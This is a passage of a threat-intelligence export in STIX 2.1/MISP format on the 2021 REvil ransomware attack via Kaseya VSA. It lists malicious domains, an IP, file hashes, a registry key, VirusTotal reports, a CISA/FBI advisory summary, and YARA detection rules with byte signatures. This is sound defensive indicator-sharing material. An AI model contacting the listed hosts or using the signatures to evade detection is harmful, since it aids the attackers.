"pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--bbdf4eb4-3f5f-435e-81a3-27eeea6ab88b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'gmto.fr']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--38f1ecc6-4e89-40db-a826-c2eda523f946", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'cerebralforce.net']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3275524c-6128-4a8e-86c5-3aa90362f9e3", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'myhostcloud.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9c0ffa35-e772-4341-b04b-8c63a3385982", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'fotoscondron.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0dedcd10-8c29-4647-80f1-8eca7d58bef2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'sw1m.ru']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--575f1379-0074-410a-9433-49b8b9958118", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'homng.net']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--10036ce7-76fb-44b5-95ec-aa98744391b2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:16:00.000Z", "modified": "2021-07-05T08:16:00.000Z", "first_observed": "2021-07-05T08:16:00Z", "last_observed": "2021-07-05T08:16:00Z", "number_observed": 1, "object_refs": [ "url--10036ce7-76fb-44b5-95ec-aa98744391b2" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--10036ce7-76fb-44b5-95ec-aa98744391b2", "value": "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--0a0a5eaa-39aa-474e-91f7-16818eb45441", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-07T09:35:06.000Z", "modified": "2021-07-07T09:35:06.000Z", "first_observed": "2021-07-07T09:35:06Z", "last_observed": "2021-07-07T09:35:06Z", "number_observed": 1, "object_refs": [ "url--0a0a5eaa-39aa-474e-91f7-16818eb45441" ], "labels": [ "misp:type=\"url\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--0a0a5eaa-39aa-474e-91f7-16818eb45441", "value": "https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--86947a18-f1ed-4ef9-bdfc-cd6d5f586179", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T07:58:29.000Z", "modified": "2021-07-05T07:58:29.000Z", "pattern": "[file:hashes.SHA256 = '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd' AND file:name = 'mpsvc.dll' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T07:58:29Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--83cac77f-3395-4e66-8748-4a3c93f13f9f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T07:59:12.000Z", "modified": "2021-07-05T07:59:12.000Z", "pattern": "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '161.35.239.148')]", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T07:59:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "network" } ], "labels": [ "misp:name=\"ip-port\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0bb49474-a26d-448c-a5fe-6a646bae941d", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:01:00.000Z", "modified": "2021-07-05T08:01:00.000Z", "pattern": "[file:hashes.SHA256 = 'd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e' AND file:name = 'agent.exe' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:01:00Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--94d2a666-8901-4fdd-b637-12cd14214ed9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:01:41.000Z", "modified": "2021-07-05T08:01:41.000Z", "pattern": "[file:hashes.SHA256 = '45aebd60e3c4ed8d3285907f5bf6c71b3b60a9bcb7c34e246c20410cf678fc0c' AND file:name = 'agent.crt']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:01:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--382db752-d40a-44b4-8043-8ed41ad534df", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:02:40.000Z", "modified": "2021-07-05T08:02:40.000Z", "pattern": "[file:hashes.MD5 = 'a47cf00aedf769d60d58bfe00c0b5421' AND file:hashes.SHA1 = '656c4d285ea518d90c1b669b79af475db31e30b1' AND file:hashes.SHA256 = '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:02:40Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--f5e08151-622f-4b0f-9a5f-3b329b8da50c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T07:25:40+00:00", "category": "Other", "uuid": "b82380c0-f8d1-4628-93db-30b0329f769c" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd/detection/f-8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd-1625469940", "category": "Payload delivery", "uuid": "9928eec8-58f6-4045-bb3e-a262fd2ba91d" }, { "type": "text", "object_relation": "detection-ratio", "value": "48/67", "category": "Payload delivery", "uuid": "7e59ed0f-cab2-4281-a782-9da359ec6216" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "pattern": "[file:hashes.MD5 = '561cffbaba71a6e8cc1cdceda990ead4' AND file:hashes.SHA1 = '5162f14d75e96edb914d1756349d6e11583db0b0' AND file:hashes.SHA256 = 'd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:15:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--6b906ba0-33c1-4070-8962-49359d7ab1e1", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T07:38:02+00:00", "category": "Other", "uuid": "62f89fbb-f229-43f3-9070-42136d2b9dcf" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e/detection/f-d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e-1625470682", "category": "Payload delivery", "uuid": "9f23d9a9-531e-4989-8855-9a9ab929a3b0" }, { "type": "text", "object_relation": "detection-ratio", "value": "45/67", "category": "Payload delivery", "uuid": "c2ed79ca-fec5-4be8-8c84-2458aba65061" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--66a1099e-fc17-4447-a35a-671d1dce2b3a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:04:38.000Z", "modified": "2021-07-05T08:04:38.000Z", "labels": [ "misp:name=\"report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "link", "object_relation": "link", "value": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", "category": "External analysis", "uuid": "3d161d9c-33c4-4e4b-b1e0-9fa940089aab" }, { "type": "text", "object_relation": "summary", "value": "CISA and the Federal Bureau of Investigation (FBI) continue to respond to the recent supply-chain ransomware attack leveraging a vulnerability in Kaseya VSA software against multiple managed service providers (MSPs) and their customers. CISA and FBI strongly urge affected MSPs and their customers to follow the guidance below.\r\n\r\nCISA and FBI recommend affected MSPs:\r\n\r\n Download the Kaseya VSA Detection Tool\r\n\r\n . This tool analyzes a system (either VSA server or managed endpoint) and determines whether any indicators of compromise (IoC) are present. \r\n Enable and enforce multi-factor authentication (MFA) on every single account that is under the control of the organization, and\u2014to the maximum extent possible\u2014enable and enforce MFA for customer-facing services.\r\n Implement allowlisting to limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and/or\r\n Place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\r\n\r\nCISA and FBI recommend MSP customers affected by this attack take immediate action to implement the following cybersecurity best practices. Note: these actions are especially important for MSP customer who do not currently have their RMM service running due to the Kaseya attack.\r\n\r\nCISA and FBI recommend affected MSP customers:\r\n\r\n Ensure backups are up to date and stored in an easily retrievable location that is air-gapped from the organizational network;\r\n Revert to a manual patch management process that follows vendor remediation guidance, including the installation of new patches as soon as they become available;\r\n Implement:\r\n Multi-factor authentication; and\r\n Principle of least privilege on key network resources admin accounts.", "category": "Other", "uuid": "8927e0f4-f8e0-455a-a97c-5fcaf825e8bb" }, { "type": "text", "object_relation": "type", "value": "Alert", "category": "Other", "uuid": "fb986017-9d19-403f-929e-959fe625dbea" } ], "x_misp_meta_category": "misc", "x_misp_name": "report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b86e6a60-1bc6-4b06-9816-7d253d8136af", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:06:34.000Z", "modified": "2021-07-05T08:06:34.000Z", "pattern": "/* Via https://github.com/bartblaze/Yara-rules/blob/master/rules/ransomware/REvil_Cert.yar\r\n*/\r\n\r\nimport \\\\\"pe\\\\\"\r\nrule REvil_Cert\r\n{\r\nmeta:\r\n\tdescription = \\\\\"Identifies the digital certificate PB03 TRANSPORT LTD, used by REvil in the Kaseya supply chain attack.\\\\\"\r\n\tauthor = \\\\\"@bartblaze\\\\\"\r\n\tdate = \\\\\"2021-07\\\\\"\r\n\treference = \\\\\"https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\\\\\"\r\n\ttlp = \\\\\"White\\\\\"\r\n\t\r\ncondition:\r\n\tuint16(0) == 0x5a4d and\r\n\t\tfor any i in (0 .. pe.number_of_signatures) : (\r\n\t\tpe.signatures[i].serial == \\\\\"11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0\\\\\"\r\n\t)\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:06:34Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--92efa833-8ea8-49ee-9d46-5fedbf946d46", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:07:06.000Z", "modified": "2021-07-05T08:07:06.000Z", "pattern": "/* Via https://github.com/bartblaze/Yara-rules/blob/master/rules/ransomware/REvil_Dropper.yar\r\n*/\r\n\r\nrule REvil_Dropper\r\n{\r\nmeta:\r\n\tdescription = \\\\\"Identifies the dropper used by REvil in the Kaseya supply chain attack.\\\\\"\r\n\tauthor = \\\\\"@bartblaze\\\\\"\r\n\tdate = \\\\\"2021-07\\\\\"\r\n\thash = \\\\\"d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e\\\\\"\r\n \treference = \\\\\"https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\\\\\"\r\n\ttlp = \\\\\"White\\\\\"\r\n\t\r\nstrings:\r\n $ = { 55 8b ec 56 8b 35 24 d0 40 00 68 04 1c 41 00 6a 65 6a 00 ff \r\n d6 85 c0 0f 84 98 00 00 00 50 6a 00 ff 15 20 d0 40 00 85 c0 0f 84 \r\n 87 00 00 00 50 ff 15 18 d0 40 00 68 14 1c 41 00 6a 66 6a 00 a3 a0 \r\n 43 41 00 ff d6 85 c0 74 6c 50 33 f6 56 ff 15 20 d0 40 00 85 c0 74 \r\n 5e 50 ff 15 18 d0 40 00 68 24 1c 41 00 ba 88 55 0c 00 a3 a4 43 41 \r\n 00 8b c8 e8 9a fe ff ff 8b 0d a0 43 41 00 ba d0 56 00 00 c7 04 ?4 \r\n 38 1c 41 00 e8 83 fe ff ff c7 04 ?4 ec 43 41 00 68 a8 43 41 00 56 \r\n 56 68 30 02 00 00 56 56 56 ff 75 10 c7 05 a8 43 41 00 44 00 00 00 \r\n 50 ff 15 28 d0 40 00 }\r\n\t\r\ncondition:\r\n\tall of them\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:07:06Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--22682f05-d593-4378-983c-e247b5f6df07", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:07:41.000Z", "modified": "2021-07-05T08:07:41.000Z", "pattern": "/* Via: https://github.com/Neo23x0/signature-base/blob/master/yara/crime_revil_general.yar\r\n*/\r\n\r\nrule APT_MAL_REvil_Kaseya_Jul21_2 {\r\n meta:\r\n description = \\\\\"Detects malware used in the Kaseya supply chain attack\\\\\"\r\n author = \\\\\"Florian Roth\\\\\"\r\n reference = \\\\\"https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b\\\\\"\r\n date = \\\\\"2021-07-02\\\\\"\r\n hash1 = \\\\\"0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402\\\\\"\r\n hash2 = \\\\\"8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd\\\\\"\r\n hash3 = \\\\\"cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6\\\\\"\r\n hash4 = \\\\\"d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f\\\\\"\r\n hash5 = \\\\\"d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20\\\\\"\r\n hash6 = \\\\\"e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2\\\\\"\r\n strings:\r\n $opa1 = { 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 }\r\n $opa2 = { 89 45 f0 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 }\r\n $opa3 = { 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 0f b6 14 01 }\r\n $opa4 = { 89 45 f4 8b 0d ?? ?0 07 10 89 4d f8 8b 15 ?? ?1 07 10 89 55 fc ff 75 fc ff 75 f8 ff 55 f4 }\r\n\r\n $opb1 = { 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc cc }\r\n $opb2 = { 18 00 10 0e 19 00 10 cc cc cc cc 8b 44 24 04 }\r\n $opb3 = { 10 c4 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc }\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n filesize < 3000KB and ( 2 of ($opa*) or 3 of them )\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:07:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f1a24c1c-d479-447e-abbe-dfc97c485829", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:08:01.000Z", "modified": "2021-07-05T08:08:01.000Z", "pattern": "/* Via https://github.com/Neo23x0/signature-base/blob/e360605894c12859de36f28fda95140aa330694b/yara/crime_ransom_revil.yar\r\n*/\r\n\r\n\r\nrule MAL_RANSOM_REvil_Oct20_1 {\r\n meta:\r\n description = \\\\\"Detects REvil ransomware\\\\\"\r\n author = \\\\\"Florian Roth\\\\\"\r\n reference = \\\\\"Internal Research\\\\\"\r\n date = \\\\\"2020-10-13\\\\\"\r\n hash1 = \\\\\"5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4\\\\\"\r\n hash2 = \\\\\"f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5\\\\\"\r\n hash3 = \\\\\"f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d\\\\\"\r\n hash4 = \\\\\"fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501\\\\\"\r\n strings:\r\n $op1 = { 0f 8c 74 ff ff ff 33 c0 5f 5e 5b 8b e5 5d c3 8b }\r\n $op2 = { 8d 85 68 ff ff ff 50 e8 2a fe ff ff 8d 85 68 ff }\r\n $op3 = { 89 4d f4 8b 4e 0c 33 4e 34 33 4e 5c 33 8e 84 }\r\n $op4 = { 8d 85 68 ff ff ff 50 e8 05 06 00 00 8d 85 68 ff }\r\n $op5 = { 8d 85 68 ff ff ff 56 57 ff 75 0c 50 e8 2f }\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n filesize < 400KB and\r\n 2 of them or 4 of them\r\n}", "pattern_type": "yara", "pattern_version": "2.1", "valid_from": "2021-07-05T08:08:01Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "misc" } ], "labels": [ "misp:name=\"yara\"", "misp:meta-category=\"misc\"", "misp:to_ids=\"True\"" ], "x_misp_context": "all" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e0115c11-ab7d-4d4c-a7a2-078a8dc6b6dd", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:11:28.000Z", "modified": "2021-07-05T08:11:28.000Z", "pattern": "[windows-registry-key:key = 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\BlackLivesMatter']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:11:28Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"registry-key\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--80fca50b-89b9-4331-9b9a-6a62e7080126", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "pattern": "[file:hashes.SHA256 = '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd' AND file:name = 'mpsvc.dll' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:15:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e489c678-49cd-4f79-a70b-9b3de81bd252", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:14:24.000Z", "modified": "2021-07-05T08:14:24.000Z", "pattern": "[file:hashes.SHA256 = '33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a' AND file:name = 'msmpeng.exe' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:14:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a855e025-6cbb-4c93-9585-95121ea5c55c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "pattern": "[file:hashes.MD5 = '8cc83221870dd07144e63df594c391d9' AND file:hashes.SHA1 = '3d409b39b8502fcd23335a878f2cbdaf6d721995' AND file:hashes.SHA256 = '33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:15:24Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--f42f63de-36c2-41d3-86d1-d1e3e3508da1", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T07:54:28+00:00", "category": "Other", "uuid": "d3098b51-a5b4-423d-8300-1d367736f857" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a/detection/f-33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a-1625471668", "category": "Payload delivery", "uuid": "d39ee2f9-56f3-42be-8de3-4e464a297c19" }, { "type": "text", "object_relation": "detection-ratio", "value": "0/68", "category": "Payload delivery", "uuid": "65828223-6628-400c-99c8-cd7a1c4e2de7" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--67af034f-5173-445b-ae08-1f1a7e9a7f87", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T08:11:57+00:00", "category": "Other", "uuid": "45e226ea-be4f-45ce-8ac1-ccdcc263a1b8" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd/detection/f-8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd-1625472717", "category": "Payload delivery", "uuid": "c93ae24c-908f-4dd0-ae98-4b376b9cf2fd" }, { "type": "text", "object_relation": "detection-ratio", "value": "48/68", "category": "Payload delivery", "uuid": "f8f3e9cd-5ff9-479d-8a71-86f210c79adb" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--e6a7fd5d-ff89-4a3f-840f-892e99de748b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-07-05T08:12:17+00:00", "category": "Other", "uuid": "1b7654f4-816d-462a-a589-1c72eeb110aa" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/gui/file/d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e/detection/f-d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e-1625472737", "category": "Payload delivery", "uuid": "43d4b31b-3140-4f05-8b0e-5f0eedd20103" }, { "type": "text", "object_relation": "detection-ratio", "value": "47/70", "category": "Payload delivery", "uuid": "9d182ba8-8b82-453f-8e0e-91f29ee97d65" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--cd7445c8-4121-45e1-a294-121ec9d35d8e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:19:46.000Z", "modified": 